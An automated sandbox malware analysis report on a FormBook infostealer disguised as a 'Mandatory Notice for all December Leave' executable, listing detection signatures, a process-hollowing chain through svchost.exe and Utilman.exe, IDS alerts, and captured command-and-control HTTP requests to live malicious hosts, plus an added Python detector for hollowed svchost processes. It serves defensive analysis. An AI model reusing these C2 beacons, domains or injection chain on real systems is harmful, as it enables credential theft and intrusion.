
Windows Analysis Report
Mandatory Notice for all December Leave and Vacation application.exe

Overview

General Information

Sample name: Mandatory Notice for all December Leave and Vacation application.exe
Analysis ID: 1560288
MD5: 201ad7754669b4d766349530adcca029
SHA1: 52d55c5235158a805ff0059793c5f349ccd87684
SHA256: e16a801f068e55f9b014ac4b4cde9415fec763830ef433cb4eb3e0ee9734bf04
Tags: exe, user-pr0xylife

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Mandatory Notice for all December Leave and Vacation application.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe" MD5: 201AD7754669B4D766349530ADCCA029)
    • svchost.exe (PID: 6152 cmdline: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eAdBvdCMNQkVZK.exe (PID: 3380 cmdline: "C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Utilman.exe (PID: 6020 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)
          • eAdBvdCMNQkVZK.exe (PID: 6308 cmdline: "C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5328 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(2 further memory-dump entries not shown in the extracted page)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems)
  Data: Command: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", CommandLine|base64offset|contains: 6bq, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ParentImage: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe, ParentProcessId: 7164, ParentProcessName: Mandatory Notice for all December Leave and Vacation application.exe, ProcessCommandLine: "C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe", ProcessId: 6152, ProcessName: svchost.exe
Source: Process started | Author: vburov
  Data: identical to the record above (the same process-creation event, PID 6152, matched a second rule)
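The two Sigma matches above fire on a single event: PID 6152 has Image C:\Windows\SysWOW64\svchost.exe, but its command line is the sample's own path and its parent is the sample rather than services.exe, which is what a hollowed svchost.exe looks like in process-creation telemetry (the sample also starts the 32-bit SysWOW64 copy on a 64-bit host). The Python below is an added example for this report, not Joe Sandbox or Sigma rule code: it applies that logic to constructed Sysmon-style process-creation records built from the process tree in this report (plus one benign control record that does not appear in the report). The expected-parent list and the 32-bit check are assumptions to tune per environment.

```python
"""Flag svchost.exe process creations with an unexpected parent or a command
line that names a different executable than the mapped image.

Added example for this report; not Joe Sandbox or Sigma rule code. The
records below are constructed from the process tree in this report and use
Sysmon Event ID 1 field names. The expected-parent list is an assumption."""

import ntpath

# Parents that normally start svchost.exe. Assumed baseline; extend it with
# what your own telemetry shows before deploying.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}

SAMPLE_EXE = (r"C:\Users\user\Desktop"
              r"\Mandatory Notice for all December Leave and Vacation application.exe")

# Constructed process-creation records. The first two take their values from
# the report's process tree; the third is a benign control (not in the report).
EVENTS = [
    {"ProcessId": 6152, "ParentProcessId": 7164,
     "Image": r"C:\Windows\SysWOW64\svchost.exe", "ParentImage": SAMPLE_EXE,
     "CommandLine": f'"{SAMPLE_EXE}"'},
    {"ProcessId": 6020, "ParentProcessId": 3380,
     "Image": r"C:\Windows\SysWOW64\Utilman.exe",
     "ParentImage": r"C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\Utilman.exe"'},
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]


def cmdline_image(cmdline: str) -> str:
    """Executable name the command line claims to run (lower-cased basename).
    Handles the quoted form; an unquoted path containing spaces is ambiguous
    on Windows and is truncated at the first space here."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        exe = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        exe = cmdline.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def detect_hollowing(events):
    """Return [(pid, [reasons])] for records whose command line does not name
    the mapped image (any process) or that are svchost.exe instances with an
    unexpected parent. The 32-bit check is a weak signal on its own."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev["ParentImage"]).lower()
        reasons = []
        claimed = cmdline_image(ev["CommandLine"])
        if claimed != image:
            reasons.append(f"command line names {claimed} but image is {image}")
        if image == "svchost.exe":
            if parent not in EXPECTED_SVCHOST_PARENTS:
                reasons.append(f"uncommon parent {parent}")
            if "\\syswow64\\" in ev["Image"].lower():
                reasons.append("32-bit svchost.exe on a 64-bit host (weak signal)")
        if reasons:
            findings.append((ev["ProcessId"], reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in detect_hollowing(EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Only PID 6152 is reported, with all three reasons; the Utilman.exe record shows that a matching command line and image gives the mismatch check nothing to flag even though the parent is unusual, so parent rules for other system binaries would need their own baseline.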
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T16:17:42.074240+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-11-21T16:17:56.788087+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49980 | 104.21.41.74 | 80 | TCP
2024-11-21T16:18:11.891178+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:27.090850+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:41.990763+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:57.059059+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 209.74.77.108 | 80 | TCP
2024-11-21T16:19:12.686987+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50000 | 38.47.232.194 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T16:17:42.074240+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-11-21T16:17:56.788087+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49980 | 104.21.41.74 | 80 | TCP
2024-11-21T16:18:11.891178+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49984 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:27.090850+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49988 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:41.990763+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49992 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:57.059059+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49996 | 209.74.77.108 | 80 | TCP
2024-11-21T16:19:12.686987+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 50000 | 38.47.232.194 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T16:17:48.785814+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49977 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:51.563396+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49978 | 104.21.41.74 | 80 | TCP
2024-11-21T16:17:54.274176+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 104.21.41.74 | 80 | TCP
2024-11-21T16:18:03.848431+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:06.502736+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:09.180543+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49983 | 172.67.167.146 | 80 | TCP
2024-11-21T16:18:19.133474+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49985 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:21.717739+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49986 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:24.520226+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:34.167613+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49989 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:36.605188+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:39.226917+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49991 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:49.052658+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49993 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:51.738208+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49994 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:54.457347+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49995 | 209.74.77.108 | 80 | TCP
2024-11-21T16:19:04.676553+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49997 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:07.346492+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:10.018402+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 49999 | 38.47.232.194 | 80 | TCP


                AV Detection

Source: Mandatory Notice for all December Leave and Vacation application.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2516266335.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4579368467.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580545569.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2513025295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4580597058.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2517323526.0000000006800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4580892352.0000000005940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Mandatory Notice for all December Leave and Vacation application.exe | Joe Sandbox ML: detected
Source: Mandatory Notice for all December Leave and Vacation application.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: Utilman.pdb source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eAdBvdCMNQkVZK.exe, 00000004.00000000.2397251111.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4579697275.0000000000D5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2129285578.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, Mandatory Notice for all December Leave and Vacation application.exe, 00000000.00000003.2130064059.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2382192450.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380304831.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2516358998.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004900000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2516921696.0000000004751000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000005.00000002.4580828676.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000005.00000003.2512946824.00000000045A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Utilman.pdbGCTL source: svchost.exe, 00000002.00000003.2458768398.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2459521153.0000000003232000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000004.00000002.4579939459.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: Utilman.exe, 00000005.00000002.4581410453.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4579598695.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000000.2583515197.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2809230685.0000000031E5C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00FC6CA9
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00FC60DD
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FC63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00FC63F9
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FCEB60
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00FCF5FA
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FCF56F FindFirstFileW,FindClose,0_2_00FCF56F
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1B2F
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00FD1C8A
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00FD1F94

                Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49801 -> 154.12.28.184:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49801 -> 154.12.28.184:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 104.21.41.74:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49980 -> 104.21.41.74:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 216.40.34.41:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 104.21.41.74:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 216.40.34.41:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 216.40.34.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 104.21.41.74:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 216.40.34.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 38.47.232.194:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 104.21.41.74:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 216.40.34.41:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 172.67.167.146:80
                Source: DNS query: www.tals.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (7 occurrences)
Source: C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe | Code function: 0_2_00FD4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FD4EB5
Source: global traffic | HTTP traffic detected:
  GET /cbbl/?StWXF0Jx=paPsyhkx/nE5gApK7ClsOsCP/JDiOaF/PnUzFNUQtr02YB3yPLZBYvOPPEhjPOJc5o/riszcMLT4SZEyBJ2Z4+e1R3WiL7BxGKUkfd9BrL6F2CyldUW6llWN7R81fMOOmA==&zfI=jXEDeV4Xp62 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Host: www.7261ltajbc.bond
  Connection: close
  User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Source: global traffic | HTTP traffic detected:
  GET /us5e/?StWXF0Jx=+3wdxQ15dA0PRlxlyKsnTLOlEhuFd9nhpeMIpGJhTalb6rEI4lQ5upkBauNLLCI1kwggOdPP7drS+cJ7ELELPajCaX5eVWqFhVj1FJt4Lm6snm9lne8G6LEoCHfH0EAuWA==&zfI=jXEDeV4Xp62 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
